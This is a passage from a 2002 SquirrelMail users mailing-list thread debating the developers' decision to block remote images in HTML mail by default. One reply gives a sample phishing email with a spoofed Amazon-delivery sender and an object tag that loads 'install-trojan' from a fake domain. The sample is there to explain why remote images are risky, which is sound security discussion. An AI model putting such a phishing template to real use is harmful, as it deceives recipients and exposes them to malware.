this, he would agree that something had to be done to fix the problem. Do
you feel that the developers make a mistake by issuing a patch that allowed
the /etc/passwd file to be read from a UW server? No everybody wants SM to
be a product that is safe and functional for everyone.
Post by Matt
You say that "this is a democracy" but yet I am not given a choice.
Sounds more like a socialist society. or a democracy among developers.
^
Nobody is stopping you from becoming a developer. You have the source code,
do something with it. There is no sign on the door that says "socialist
developers only".
Post by Matt
What happened to the SM community? Have the doors been closed? Are
you suggesting that the only way to participate is to make code
changes? There are alot of other ways to be involved.
^
Yes, create a plugin. If you can't perhaps if you suggest a new plugin
somebody might pick up the code and do the work. Sending emails that state
how you think this project is not going well will only make a developer
ignore you. Anybody that uses the SM interface is involved one way or
another, but that does not give you a reason to dictate how the code should
work. If you want to see code changes, then you have to do the work.
Post by Matt
I do not, and will not, support any developers decision that I do not
agree with.
^
Are you paying any of these developers? Do you give them a server that they
can work on? Do you pay any of the costs involved with the bandwith and
hosting? Until you contribute either by developing or giving these
developers a reason to make changes you see fit, then you must deal with the
fact that they are in charge of the code.


The fact remains that SM is free and is the best webmail interface. Just the
fact that you can write your own plugin to change it's functionality makes
it a wonderful idea. If you ask me, I think the developers are doing one
hell of a job!

If I felt that I was a strong php coder, I would try to help with the
development process, but I'm not. So I use the software and report any
problems that occur.

Nobody is saying you can't have an opinion, but it comes down to who does
the work. So with that I will cut this thread loose.

I have voiced my opinion

Thank you for listening
Post by Matt
Post by Venge -- Lokalsound
I'm on the same page as Konstantin and the developers. I deal with
people who don't know the first thing about security. People who like
to use their username as their password and think that since they
can't hit a particular website that the internet is down and we are
responsible. People don't know the risk of security and don't
appreciate it until they ask one of us to fix the problem. It's nice
to have a security threat stomped, almost like a warning saying "If
you are dumb enough to take this risk, don't bother me about a
solution". I feel that the images security thing is a ++ to SM. As
long as the developers spend their free (and unpaid) time to this
project, we should support their decision to leave code in or out. If
you feel differently, pick up a book on PHP and learn it. It's not the
hardest language, actually it has one of the easiest learning curves.
Make your own fix to a problem (or a customization) and post it. You
have to remember, this is open source and comes as-is. If you want to
be a beta tester for disaster, go and shell out $200 on a microsoft
product. SM is meant to be as easy to use for the end user, but its
security must also be kept in mind. The last thing I need is walking
joe smoe through a recovery process because he likes his p0rn mail in
html. I'm not the best PHP programmer, but I do try to make my own
changes as I go along. If you feel that "image security" is a problem,
write a plugin to change it's functionality.
~venge
Post by Konstantin Riabitsev
Post by Matt
option. SM developers should not say stuff like :"so you'll have to
find someone else to implement it." (See bottom of this email
for the quote)
No, they in fact can, and do. The majority of developers have agreed
that allowing images by default is a very nasty risk, and since we
tend to know better than end-users, we made the choice for them --
mind, with a way to override the security and view the images anyway.
Post by Matt
Please implement in as an option in the next version, remove it or
relegate it to a pluging. It is beyond the "core" funcitonality of
SM and imposes you views on users like myself.
No, it's not beyond the core of the functionality. Security is a very
integral part of SquirrelMail and we reserve the right to make a
knowledgeable decision about security matters. In fact, this feature
was implemented right after this vulnerability was reported to a
security list.
Post by Matt
Im sure Luke would not have included "manditory" option since it
skews far off course from the original intent of SM.
It's a democracy. Learn it, use it, love it. You are free to patch
this behavior out of the program -- the source is right there.
Security is our #1 concern. If you are looking for a different
mindset, you are welcome to the world of Microsoft.
Regards,
--
0> Konstantin ("Icon") Riabitsev
/ ) Duke University Physics Sysadmin
~ www.duke.edu/~icon/pubkey.asc
--
squirrelmail-users mailing list
https://lists.sourceforge.net/lists/listinfo/squirrelmail-users
http://squirrelmail.org/cvs
Luc Brouard
2002-03-06 21:44:04 UTC
Permalink
Post by Derek Battams
Kind of jumping off on to a side tangent here, but what constitutes an
"insecure" image?  All of my testing with 1.2.4 and 1.2.5 has deemed any
image in an HTML email to be replaced by the insecure image file.  I just
assumed that all images were considered unsafe and were replaced.  Are
thereexceptions?
It was said on the list that an insecure image was one not from the domain name
corresponding to the mail address of the sender.

luc
Post by Derek Battams
Thanks,
Derek
Konstantin Riabitsev
2002-03-06 22:13:04 UTC
Permalink
Post by Luc Brouard
Post by Derek Battams
Kind of jumping off on to a side tangent here, but what constitutes an
"insecure" image? All of my testing with 1.2.4 and 1.2.5 has deemed any
image in an HTML email to be replaced by the insecure image file. I just
assumed that all images were considered unsafe and were replaced. Are
thereexceptions?
It was said on the list that an insecure image was one not from the domain name
corresponding to the mail address of the sender.
No, that is incorrect. Secure images are those that are attached to the
e-mail itself, not linked off the web or elsewhere.

Regards,
--
0> Konstantin ("Icon") Riabitsev
/ ) Duke University Physics Sysadmin
~ www.duke.edu/~icon/pubkey.asc
Bron Gondwana
2002-03-07 10:13:02 UTC
Permalink
Post by Luc Brouard
It was said on the list that an insecure image was one not from the
domain name corresponding to the mail address of the sender.
I would disagree with this. Consider the following:

From: ***@amazon-deliveries.com
Subject: Please confirm the delivery address for your order (#234734)
Content-Type: text/html

<body>
<img src="Loading Image...">
<object class="http://amazon-deliveries.com/install-trojan.mpg">
Something or other about an alleged book order to entirely the wrong
address.
</body>

.. is bound to catch a _LOT_ of people by the subject line and fake
domain (note: whois => No match for "AMAZON-DELIVERIES.COM" - for $15
and no human intervention to catch the name, this could be yours to
spam from) ..

.. and that's the people who aren't just 'Prev', 'Delete & Prev'ing
through their email as I frequently do.

In general, I would say _anything_ which causes the client web browser
to make another HTTP request to any host other than the host running
squirrelmail is automatically judged suspect. Even the host running
squirrelmail is a little dodgy if it allows people to upload files
to anywhere at all - but at least that's usually restricted to other
valid users on the system, and more to the point, the http logs will
allow the offender to be traced.

I like the option of only allowing viewing of suspect images AFTER
the user has looked at the message and a pair of human eyes have
validated it as safe. Even then, humans are easy to social engineer,
but that is just life.

Regards,

Bron.
Luc Brouard (mailing lists)
2002-03-07 10:25:02 UTC
Permalink
Post by Luc Brouard
It was said on the list that an insecure image was one not from the
domain name corresponding to the mail address of the sender.
Yep, I had read the list before too fast and remembered too badly, my fault.
I like the option of only allowing viewing of suspect images AFTER the
user has looked at the message and a pair of human eyes have
validated it as safe. Even then, humans are easy to social engineer,
but that is just life.
I like that option myself ... I hadn't moved to sq 1.2.3 and 1.2.4
because it removed the possibility to view html messages.
But with this link (at the bottom of the messages), I like it better that
before.

Luc
Loading...